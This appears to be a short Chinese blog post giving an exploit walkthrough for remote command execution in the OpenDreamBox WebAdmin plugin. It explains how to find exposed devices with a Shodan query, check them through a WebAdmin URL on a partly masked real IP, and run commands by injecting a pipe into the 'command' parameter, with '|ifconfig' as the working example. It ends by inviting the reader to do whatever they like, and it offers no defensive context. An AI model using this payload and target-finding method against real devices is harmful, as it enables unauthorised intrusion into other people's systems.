Jirairya

OpenDreamBox-WebAdmin远程代码执行


OpenDreamBox的插件WebAdmin远程代码执行

搜索漏洞

使用shodan搜索"Dreambox 200 ok"

shodan

攻击

验证漏洞

若在url为http://**.125.96.***:8889填入/webadmin/#!/ipk/installed能显示出:

ipk_installed

就可以构造POC:http://**.125.96.***:8889/webadmin/script?command=|命令。比如http://**.125.96.***:8889/webadmin/script?command=|ifconfig:

接下来就是可以做一些自己可以做的事情。。


Similar Posts

上一篇 RTFM-Unix

Comments